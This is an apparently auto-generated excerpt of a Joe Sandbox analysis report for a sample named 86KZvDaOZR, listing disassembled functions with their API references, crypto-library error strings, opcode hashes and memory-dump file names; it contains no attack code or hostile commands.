Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: Xinvalid_argumentstd::_$_memmove
String ID: string too long
API String ID: 2168136238-2556327735
Opcode ID: a656a0679a8a6a91cbc8eb85a10608643572e921456bd6a1dcba54f7cb9f463c
Instruction ID: ecfe41795c94af6dccfa77a86144f59db74daae376d6446816a48132672feba9
Opcode Fuzzy Hash: a656a0679a8a6a91cbc8eb85a10608643572e921456bd6a1dcba54f7cb9f463c
Instruction Fuzzy Hash: 7A31E7323156105BD7228E5CECA0A5BFBE9EBB5B24B210A1FE491C7F42C761DC44A7A1

Function 6CF3C350 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 104COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 6CF3C39B

Strings

gfff, xrefs: 6CF3C3A3
gfff, xrefs: 6CF3C3F7

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: Exception@8Throw
String ID: gfff$gfff
API String ID: 2005118841-3084402119
Opcode ID: 0fc975951894ecdd0a9fd187ee17f5a7dd85dbf523fbdf3c3300f41ba2466e2d
Instruction ID: 28ffd0de8b5a29c9b7985ade92115d4d549ccd87880adba0a83909f418fe9429
Opcode Fuzzy Hash: 0fc975951894ecdd0a9fd187ee17f5a7dd85dbf523fbdf3c3300f41ba2466e2d
Instruction Fuzzy Hash: 6E31737150061DAFD714CF98D890EFEB779EB84318F44861CE9199B784D730BA19CBA1

Function 6CF018C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98COMMON

Download Yara Rule

APIs

Part of subcall function 6CF04010: std::_Xinvalid_argument.LIBCPMT ref: 6CF0402A

__CxxThrowException@8.LIBCMT ref: 6CF0194F

Part of subcall function 6CF6AC75: RaiseException.KERNEL32(?,?,6CF69C34,A64A5C11,?,?,?,?,6CF69C34,A64A5C11,6CF99C90,6CFAB974,A64A5C11), ref: 6CF6ACB7

std::exception::exception.LIBCMT ref: 6CF0198E

Part of subcall function 6CF695C1: std::exception::operator=.LIBCMT ref: 6CF695DA

Part of subcall function 6CF04010: std::_Xinvalid_argument.LIBCPMT ref: 6CF04067
Part of subcall function 6CF04010: _memmove.LIBCMT ref: 6CF040C8

Strings

Clone() is not implemented yet., xrefs: 6CF018ED

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: Xinvalid_argumentstd::_$ExceptionException@8RaiseThrow_memmovestd::exception::exceptionstd::exception::operator=
String ID: Clone() is not implemented yet.
API String ID: 2192554526-226299721
Opcode ID: 564da274b0678f665fc31f2aeb47246f9fafa0555e98f9d5bea3274eb4af6da8
Instruction ID: 7c5303763076ff6aa8ceeb95c4143f12be950adda2c083ef3c9d10a4bfbcbfd8
Opcode Fuzzy Hash: 564da274b0678f665fc31f2aeb47246f9fafa0555e98f9d5bea3274eb4af6da8
Instruction Fuzzy Hash: 30314F71905248EFDB14CF99D850BEEFFB8EB15724F10462EE421A7B90D7759A088B50

Function 6CF35560 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 95COMMON

Download Yara Rule

APIs

Part of subcall function 6CF04010: std::_Xinvalid_argument.LIBCPMT ref: 6CF0402A

__CxxThrowException@8.LIBCMT ref: 6CF35657

Part of subcall function 6CF6AC75: RaiseException.KERNEL32(?,?,6CF69C34,A64A5C11,?,?,?,?,6CF69C34,A64A5C11,6CF99C90,6CFAB974,A64A5C11), ref: 6CF6ACB7

Strings

StringStore: missing InputBuffer argument, xrefs: 6CF355E0
InputBuffer, xrefs: 6CF355BF

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: ExceptionException@8RaiseThrowXinvalid_argumentstd::_
String ID: InputBuffer$StringStore: missing InputBuffer argument
API String ID: 3718517217-2380213735
Opcode ID: 5b51de1fcdb16821cfc6ede635f5aee40b6f1441b86ec9caf5005bd9091837d8
Instruction ID: aabd8b6174900c547b423ddd267625b141c19cdcc29e95e245e2e1540f97a8f3
Opcode Fuzzy Hash: 5b51de1fcdb16821cfc6ede635f5aee40b6f1441b86ec9caf5005bd9091837d8
Instruction Fuzzy Hash: 564117B16083809FC320CF59D490A9BFBE4BB99714F548A1EF5A983790DB7599088B52

Function 6CF01EA0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94COMMON

Download Yara Rule

APIs

Part of subcall function 6CF04010: std::_Xinvalid_argument.LIBCPMT ref: 6CF0402A

__CxxThrowException@8.LIBCMT ref: 6CF01F36

Part of subcall function 6CF6AC75: RaiseException.KERNEL32(?,?,6CF69C34,A64A5C11,?,?,?,?,6CF69C34,A64A5C11,6CF99C90,6CFAB974,A64A5C11), ref: 6CF6ACB7

std::exception::exception.LIBCMT ref: 6CF01F6E

Part of subcall function 6CF695C1: std::exception::operator=.LIBCMT ref: 6CF695DA

Part of subcall function 6CF04010: std::_Xinvalid_argument.LIBCPMT ref: 6CF04067
Part of subcall function 6CF04010: _memmove.LIBCMT ref: 6CF040C8

Strings

CryptoMaterial: this object does not support precomputation, xrefs: 6CF01ED4

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: Xinvalid_argumentstd::_$ExceptionException@8RaiseThrow_memmovestd::exception::exceptionstd::exception::operator=
String ID: CryptoMaterial: this object does not support precomputation
API String ID: 2192554526-3625584042
Opcode ID: 9ea1fba4cd9d8399d1c691e49bd270643a5b09359b03e6cf531b9f63bfce3e9f
Instruction ID: ff31135db2579456ae707245e93cedd6a53f67ee5c21ff6209219cc9e9444700
Opcode Fuzzy Hash: 9ea1fba4cd9d8399d1c691e49bd270643a5b09359b03e6cf531b9f63bfce3e9f
Instruction Fuzzy Hash: 36315071905248EFDB14CF99D840BDEFBB8FB09724F10866EE421A7B90D7759A08CB50

Function 6CF13317 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 90COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 6CF13327

Part of subcall function 6CF6AC75: RaiseException.KERNEL32(?,?,6CF69C34,A64A5C11,?,?,?,?,6CF69C34,A64A5C11,6CF99C90,6CFAB974,A64A5C11), ref: 6CF6ACB7

std::_Xinvalid_argument.LIBCPMT ref: 6CF1336B

Part of subcall function 6CF690D8: std::exception::exception.LIBCMT ref: 6CF690ED
Part of subcall function 6CF690D8: __CxxThrowException@8.LIBCMT ref: 6CF69102
Part of subcall function 6CF690D8: std::exception::exception.LIBCMT ref: 6CF69113

Strings

vector<T> too long, xrefs: 6CF13366

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: Exception@8Throwstd::exception::exception$ExceptionRaiseXinvalid_argumentstd::_
String ID: vector<T> too long
API String ID: 1735018483-3788999226
Opcode ID: 3d59b2507e4fa5f147ae34f80516d0cf45abda033a80c1cf44220580b5d4716f
Instruction ID: 833de54ec682bccdc3e1c906c3d0b4c2d6246403515ea76e2e2fa0cc4f6a0473
Opcode Fuzzy Hash: 3d59b2507e4fa5f147ae34f80516d0cf45abda033a80c1cf44220580b5d4716f
Instruction Fuzzy Hash: 8C31B475A08245DFCB14DFA8D890B9EF7B0EB45318F114639E9199BF90DB32AD04CB91

Function 6CF25810 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6CF2584D

Part of subcall function 6CF690D8: std::exception::exception.LIBCMT ref: 6CF690ED
Part of subcall function 6CF690D8: __CxxThrowException@8.LIBCMT ref: 6CF69102
Part of subcall function 6CF690D8: std::exception::exception.LIBCMT ref: 6CF69113

VariantClear.OLEAUT32(00000000), ref: 6CF25899

Strings

vector<T> too long, xrefs: 6CF25848

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: std::exception::exception$ClearException@8ThrowVariantXinvalid_argumentstd::_
String ID: vector<T> too long
API String ID: 2677079660-3788999226
Opcode ID: 6ac85d94eda24d6366019ed66e68d65c5ff6d486dbba08f2ded93565544909af
Instruction ID: 202c16cf9a0b18ad1be242edb99c96f9933360726681c495d264ac85509eaa56
Opcode Fuzzy Hash: 6ac85d94eda24d6366019ed66e68d65c5ff6d486dbba08f2ded93565544909af
Instruction Fuzzy Hash: CD21B372A016059FD710CFA8C880AAEB7F9FF44324F244A2EE455D7B40DB74A9048B91

Function 6CF15750 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6CF1576B

Part of subcall function 6CF690D8: std::exception::exception.LIBCMT ref: 6CF690ED
Part of subcall function 6CF690D8: __CxxThrowException@8.LIBCMT ref: 6CF69102
Part of subcall function 6CF690D8: std::exception::exception.LIBCMT ref: 6CF69113

std::_Xinvalid_argument.LIBCPMT ref: 6CF15782

Strings

string too long, xrefs: 6CF15766, 6CF1577D

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
String ID: string too long
API String ID: 963545896-2556327735
Opcode ID: cd01da7f7fd6ae49d78b20bf1b51d26ba626cc146ba84409c724b10a2b826d43
Instruction ID: 5b3849353c2ee015dea3430e7e6a9754a190e363e0fa88c22b07830e4cb6ddc4
Opcode Fuzzy Hash: cd01da7f7fd6ae49d78b20bf1b51d26ba626cc146ba84409c724b10a2b826d43
Instruction Fuzzy Hash: 2911B9333086149FD321DA6DE891A6AF7EDEF95634F60071FE5A2C7F40C761980483A1

Function 6CF046B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6CF046C4

Part of subcall function 6CF690D8: std::exception::exception.LIBCMT ref: 6CF690ED
Part of subcall function 6CF690D8: __CxxThrowException@8.LIBCMT ref: 6CF69102
Part of subcall function 6CF690D8: std::exception::exception.LIBCMT ref: 6CF69113

_memmove.LIBCMT ref: 6CF0470B

Strings

string too long, xrefs: 6CF046BF

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
String ID: string too long
API String ID: 1785806476-2556327735
Opcode ID: 0b2cdcc6cb25828269ae813dd38c515579d14bbcb584876dc41f38d7e65a795f
Instruction ID: 0a03da73bec10151d60154137ceb6f88875e3d7b26104ce23c8f2d6f62e83a89
Opcode Fuzzy Hash: 0b2cdcc6cb25828269ae813dd38c515579d14bbcb584876dc41f38d7e65a795f
Instruction Fuzzy Hash: D3110B722053105FE720DE7CA8D0A6ABBA8EF61B18F240B2FD497C3E81D721E4489751

Function 6CF34D30 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 73COMMON

Download Yara Rule

APIs

Part of subcall function 6CF04010: std::_Xinvalid_argument.LIBCPMT ref: 6CF0402A

__CxxThrowException@8.LIBCMT ref: 6CF34E00

Part of subcall function 6CF6AC75: RaiseException.KERNEL32(?,?,6CF69C34,A64A5C11,?,?,?,?,6CF69C34,A64A5C11,6CF99C90,6CFAB974,A64A5C11), ref: 6CF6ACB7

Strings

ArraySink: missing OutputBuffer argument, xrefs: 6CF34D91
OutputBuffer, xrefs: 6CF34D77

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: ExceptionException@8RaiseThrowXinvalid_argumentstd::_
String ID: ArraySink: missing OutputBuffer argument$OutputBuffer
API String ID: 3718517217-3781944848
Opcode ID: e81cd2e91043845890398422557cb872b1abf18b86015b4e987c3ecc0a98264e
Instruction ID: 0a8f8579d5460129748e476dba1e32f21d249648249d19d71564927a858c92f2
Opcode Fuzzy Hash: e81cd2e91043845890398422557cb872b1abf18b86015b4e987c3ecc0a98264e
Instruction Fuzzy Hash: CA3103B550C3809FC310CF69C890A9ABBF4BB99714F508E1EF4A583B90DB75D908CB92

Function 6CF10150 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 65COMMON

Download Yara Rule

APIs

Part of subcall function 6CF04010: std::_Xinvalid_argument.LIBCPMT ref: 6CF0402A

__CxxThrowException@8.LIBCMT ref: 6CF10201

Part of subcall function 6CF6AC75: RaiseException.KERNEL32(?,?,6CF69C34,A64A5C11,?,?,?,?,6CF69C34,A64A5C11,6CF99C90,6CFAB974,A64A5C11), ref: 6CF6ACB7

Strings

StringSink: OutputStringPointer not specified, xrefs: 6CF1019B
OutputStringPointer, xrefs: 6CF1018C

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: ExceptionException@8RaiseThrowXinvalid_argumentstd::_
String ID: OutputStringPointer$StringSink: OutputStringPointer not specified
API String ID: 3718517217-1331214609
Opcode ID: 704accbe64b3ae1e9e572636a66813baa51289a15873cb7c88cdfee595baad48
Instruction ID: 53549d44d3ef8c92ca6cf9047007caa3dcb85280e45389803762b3816126a0d6
Opcode Fuzzy Hash: 704accbe64b3ae1e9e572636a66813baa51289a15873cb7c88cdfee595baad48
Instruction Fuzzy Hash: 91215E71D05288AFCB04DFD9D890BDDFBB4EB09314F10865AE825A7B91DB359A08CB50

Function 6CF04620 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6CF04636

Part of subcall function 6CF69125: std::exception::exception.LIBCMT ref: 6CF6913A
Part of subcall function 6CF69125: __CxxThrowException@8.LIBCMT ref: 6CF6914F
Part of subcall function 6CF69125: std::exception::exception.LIBCMT ref: 6CF69160

_memmove.LIBCMT ref: 6CF0466F

Strings

invalid string position, xrefs: 6CF04631

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
String ID: invalid string position
API String ID: 1785806476-1799206989
Opcode ID: 87a9b37560cf781cbabaed10849dcd368bd7d4b84fcc78a9d9b485769db6f8a2
Instruction ID: 38b3fee366a2c9e2bb5aedbc000810e349b44af53bcde4fa1632c38354be0b72
Opcode Fuzzy Hash: 87a9b37560cf781cbabaed10849dcd368bd7d4b84fcc78a9d9b485769db6f8a2
Instruction Fuzzy Hash: B301DB323003408BD3208E5CDCA095AFBBADBE1B54B24492DD195CBF01EAB1EC4197A1

Function 6CF3ACA0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54COMMON

Download Yara Rule

APIs

type_info::operator!=.LIBCMT ref: 6CF3ACF8

Strings

PublicExponent, xrefs: 6CF3AD1F
Modulus, xrefs: 6CF3AD30

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: type_info::operator!=
String ID: Modulus$PublicExponent
API String ID: 2241493438-3324115277
Opcode ID: 3a697c3cd3318921c6c7df3f64742021cbd8a65667cd6f475bdc81682217a3db
Instruction ID: e4e8eaddc593d48cbedbda51c33a8e10f8cb9750d348df3dfe639a86f311e7cd
Opcode Fuzzy Hash: 3a697c3cd3318921c6c7df3f64742021cbd8a65667cd6f475bdc81682217a3db
Instruction Fuzzy Hash: 6C11E3319093146FCA00DFAA884458BFBE4BFD5648F00661EF8895BB60DB31D94CCBD2

Function 6CF5B7F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54COMMON

Download Yara Rule

APIs

type_info::operator!=.LIBCMT ref: 6CF5B848

Strings

PublicExponent, xrefs: 6CF5B86F
Modulus, xrefs: 6CF5B880

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
